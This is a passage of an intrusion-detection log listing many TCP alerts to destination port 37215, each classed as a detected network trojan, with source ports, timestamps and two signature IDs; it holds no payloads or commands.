                  Source Port:52662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.885444
                  SID:2829579
                  Source Port:41406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.277665
                  SID:2835222
                  Source Port:45842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.256446
                  SID:2829579
                  Source Port:58464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.868570
                  SID:2835222
                  Source Port:58576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.423127
                  SID:2829579
                  Source Port:53830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.680054
                  SID:2829579
                  Source Port:55092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.397077
                  SID:2829579
                  Source Port:58600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.491669
                  SID:2835222
                  Source Port:46020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.130365
                  SID:2829579
                  Source Port:38848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.478959
                  SID:2829579
                  Source Port:47896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.285342
                  SID:2829579
                  Source Port:55634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.010267
                  SID:2835222
                  Source Port:53614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.240759
                  SID:2835222
                  Source Port:34450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.950473
                  SID:2829579
                  Source Port:49992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.198979
                  SID:2835222
                  Source Port:34148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.885760
                  SID:2835222
                  Source Port:46276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.739348
                  SID:2835222
                  Source Port:45210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.514897
                  SID:2829579
                  Source Port:57442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.494095
                  SID:2835222
                  Source Port:40870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.596849
                  SID:2835222
                  Source Port:33032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.518118
                  SID:2829579
                  Source Port:36998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.174842
                  SID:2835222
                  Source Port:36414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.792131
                  SID:2835222
                  Source Port:43174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.028986
                  SID:2829579
                  Source Port:37204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.379030
                  SID:2829579
                  Source Port:59716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.256237
                  SID:2829579
                  Source Port:56620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.810736
                  SID:2835222
                  Source Port:60188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.483063
                  SID:2829579
                  Source Port:33760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.118074
                  SID:2835222
                  Source Port:39488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.648107
                  SID:2835222
                  Source Port:52166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.655198
                  SID:2835222
                  Source Port:58322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.526504
                  SID:2835222
                  Source Port:58528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.942204
                  SID:2835222
                  Source Port:56036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.017003
                  SID:2829579
                  Source Port:54006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.353387
                  SID:2829579
                  Source Port:52238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.984415
                  SID:2835222
                  Source Port:53520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.071295
                  SID:2835222
                  Source Port:56264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.063250
                  SID:2829579
                  Source Port:53574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.617783
                  SID:2829579
                  Source Port:54718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.132351
                  SID:2835222
                  Source Port:60674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.619838
                  SID:2829579
                  Source Port:49224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.903696
                  SID:2829579
                  Source Port:44166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.546490
                  SID:2835222
                  Source Port:60566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.847797
                  SID:2835222
                  Source Port:47344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.507249
                  SID:2835222
                  Source Port:41670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.865675
                  SID:2835222
                  Source Port:45478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.160309
                  SID:2835222
                  Source Port:40350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.641712
                  SID:2835222
                  Source Port:39758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.577459
                  SID:2835222
                  Source Port:53962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.521470
                  SID:2829579
                  Source Port:43068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.428214
                  SID:2835222
                  Source Port:35940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.219271
                  SID:2829579
                  Source Port:49054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.853499
                  SID:2835222
                  Source Port:51184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.992785
                  SID:2829579
                  Source Port:42926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.431217
                  SID:2835222
                  Source Port:33624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.175812
                  SID:2829579
                  Source Port:58548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.438982
                  SID:2835222
                  Source Port:60570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.850046
                  SID:2829579
                  Source Port:47868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.853796
                  SID:2835222
                  Source Port:33954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.922024
                  SID:2829579
                  Source Port:35366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.494208
                  SID:2829579
                  Source Port:36364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.620652
                  SID:2835222
                  Source Port:54348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.927319
                  SID:2835222
                  Source Port:35336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.994828
                  SID:2829579
                  Source Port:51036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.078993
                  SID:2835222
                  Source Port:50454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.632991
                  SID:2829579
                  Source Port:59780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.503966
                  SID:2829579
                  Source Port:40938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.379433
                  SID:2829579
                  Source Port:45936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.373559
                  SID:2829579
                  Source Port:34280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.849175
                  SID:2829579
                  Source Port:56774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.808876
                  SID:2829579
                  Source Port:53116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.865675
                  SID:2829579
                  Source Port:48262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.848972
                  SID:2835222
                  Source Port:34726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.802281
                  SID:2835222
                  Source Port:55050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.524436
                  SID:2829579
                  Source Port:51950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.878882
                  SID:2829579
                  Source Port:59872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.249452
                  SID:2829579
                  Source Port:46908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.959862
                  SID:2829579
                  Source Port:46466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.563571
                  SID:2829579
                  Source Port:42628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.910234
                  SID:2829579
                  Source Port:46884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.171855
                  SID:2835222
                  Source Port:43104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.538484
                  SID:2829579
                  Source Port:36190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.114397
                  SID:2835222
                  Source Port:46718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.539411
                  SID:2835222
                  Source Port:56232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.746673
                  SID:2835222
                  Source Port:49602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.853234
                  SID:2829579
                  Source Port:43272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.297674
                  SID:2835222
                  Source Port:34334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.621338
                  SID:2829579
                  Source Port:58692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.659396
                  SID:2829579
                  Source Port:43794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.804743
                  SID:2829579
                  Source Port:40678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.554378
                  SID:2829579
                  Source Port:46832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.483733
                  SID:2829579
                  Source Port:34688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.612875
                  SID:2829579
                  Source Port:49138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.143490
                  SID:2835222
                  Source Port:50012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.139593
                  SID:2835222
                  Source Port:41310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.273517
                  SID:2835222
                  Source Port:41620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.912522
                  SID:2835222
                  Source Port:44680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.109463
                  SID:2835222
                  Source Port:41110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.710237
                  SID:2829579
                  Source Port:45468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.834226
                  SID:2835222
                  Source Port:40854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.608013
                  SID:2829579
                  Source Port:35594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.439296
                  SID:2835222
                  Source Port:53236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.866778
                  SID:2835222
                  Source Port:36934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.240926
                  SID:2835222
                  Source Port:55306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.977851
                  SID:2829579
                  Source Port:60952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.422156
                  SID:2829579
                  Source Port:39228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.631449
                  SID:2835222
                  Source Port:37056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.905165
                  SID:2829579
                  Source Port:46700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.625043
                  SID:2829579
                  Source Port:45632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.461337
                  SID:2835222
                  Source Port:47512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.409730
                  SID:2835222
                  Source Port:43708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.667914
                  SID:2829579
                  Source Port:32782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.645443
                  SID:2829579
                  Source Port:34754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.351462
                  SID:2835222
                  Source Port:58378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.136895
                  SID:2835222
                  Source Port:56594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.868135
                  SID:2829579
                  Source Port:35162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.664822
                  SID:2829579
                  Source Port:52620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.396195
                  SID:2835222
                  Source Port:38076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.594694
                  SID:2835222
                  Source Port:55668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.561503
                  SID:2829579
                  Source Port:48860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.966535
                  SID:2835222
                  Source Port:37186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.418870
                  SID:2835222
                  Source Port:49236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.764270
                  SID:2829579
                  Source Port:45300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.165176
                  SID:2829579
                  Source Port:49644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.259600
                  SID:2835222
                  Source Port:45996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.074173
                  SID:2835222
                  Source Port:34138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.541811
                  SID:2835222
                  Source Port:39398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.860348
                  SID:2829579
                  Source Port:54060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.909366
                  SID:2829579
                  Source Port:40810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.542199
                  SID:2835222
                  Source Port:52566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.516860
                  SID:2835222
                  Source Port:39534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.296739
                  SID:2835222
                  Source Port:58952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.817935
                  SID:2829579
                  Source Port:49910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.739348
                  SID:2835222
                  Source Port:48380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.647124
                  SID:2835222
                  Source Port:43922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.334361
                  SID:2829579
                  Source Port:50796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.638682
                  SID:2835222
                  Source Port:55740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.213907
                  SID:2835222
                  Source Port:58918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.318563
                  SID:2829579
                  Source Port:37328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.839655
                  SID:2835222
                  Source Port:58210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.906271
                  SID:2835222
                  Source Port:39858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.448352
                  SID:2835222
                  Source Port:50744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.070289
                  SID:2835222
                  Source Port:41616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.810871
                  SID:2835222
                  Source Port:36152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.634694
                  SID:2835222
                  Source Port:48200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.027188
                  SID:2829579
                  Source Port:50086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.360438
                  SID:2829579
                  Source Port:37754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.922024
                  SID:2835222
                  Source Port:33678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.561854
                  SID:2835222
                  Source Port:33028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.399682
                  SID:2835222
                  Source Port:46134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.513805
                  SID:2829579
                  Source Port:44672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.836737
                  SID:2829579
                  Source Port:51490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.979211
                  SID:2835222
                  Source Port:42332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.861773
                  SID:2835222
                  Source Port:55020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.671571
                  SID:2835222
                  Source Port:58924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.275564
                  SID:2829579
                  Source Port:34464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.159801
                  SID:2829579
                  Source Port:34486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.915007
                  SID:2835222
                  Source Port:35876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.288558
                  SID:2829579
                  Source Port:36414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.012931
                  SID:2835222
                  Source Port:54018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.863530
                  SID:2829579
                  Source Port:49104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.197285
                  SID:2829579
                  Source Port:38624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.922579
                  SID:2829579
                  Source Port:41310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.300900
                  SID:2829579
                  Source Port:46290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.572327
                  SID:2829579
                  Source Port:49278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.973887
                  SID:2829579
                  Source Port:59816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.121354
                  SID:2829579
                  Source Port:39064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.774458
                  SID:2835222
                  Source Port:53124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.879424
                  SID:2835222
                  Source Port:37528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.737696
                  SID:2835222
                  Source Port:59780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.337893
                  SID:2835222
                  Source Port:50144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.795318
                  SID:2829579
                  Source Port:60958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.416571
                  SID:2829579
                  Source Port:35574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.446597
                  SID:2835222
                  Source Port:46126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.877768
                  SID:2829579
                  Source Port:44058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.779855
                  SID:2835222
                  Source Port:35646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.063686
                  SID:2835222
                  Source Port:43006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.907350
                  SID:2835222
                  Source Port:34844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290306
                  SID:2835222
                  Source Port:42690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.406060
                  SID:2835222
                  Source Port:33174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.594845
                  SID:2829579
                  Source Port:53620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.161744
                  SID:2829579
                  Source Port:39968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.987443
